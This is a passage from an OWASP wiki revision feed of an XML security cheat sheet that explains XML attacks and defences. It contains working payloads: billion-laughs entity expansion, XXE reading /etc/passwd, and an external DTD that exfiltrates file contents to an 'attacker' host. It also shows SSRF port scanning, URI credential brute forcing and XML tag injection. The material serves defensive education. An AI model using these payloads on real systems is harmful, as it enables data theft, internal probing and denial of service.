  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;&amp;lt;nowiki&amp;gt;URN:PARASOFT:WS:STORE&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External DNS Resolution ====&lt;br /&gt;
&lt;br /&gt;
Sometimes is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. This is one of the simplest forms of SSRF, but requires the attacker to analyze the DNS traffic. Burp has a plugin that checks for this attack.&lt;br /&gt;
 &amp;lt;!DOCTYPE m PUBLIC &amp;quot;-//B/A/EN&amp;quot; &amp;quot;http://'''checkforthisspecificdomain'''.example.com&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''%xxe''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM '&amp;lt;nowiki/&amp;gt;'''&amp;lt;nowiki&amp;gt;http://example.com/?%file;'&amp;lt;/nowiki&amp;gt;'''''&amp;gt;&amp;quot;&amp;gt;''&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: &amp;lt;nowiki&amp;gt;http://192.168.1.1:80&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme (http, ftp, etc). For example the following :&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
Fernando Arnaboldi - fernando.arnaboldi [at] ioactive.com&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=229386</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=229386"/>
				<updated>2017-05-03T19:53:14Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: Server Side Request Forgery: DNS Resolution. Removed unnecessary links.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;nowiki&amp;gt;&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;&amp;lt;/nowiki&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
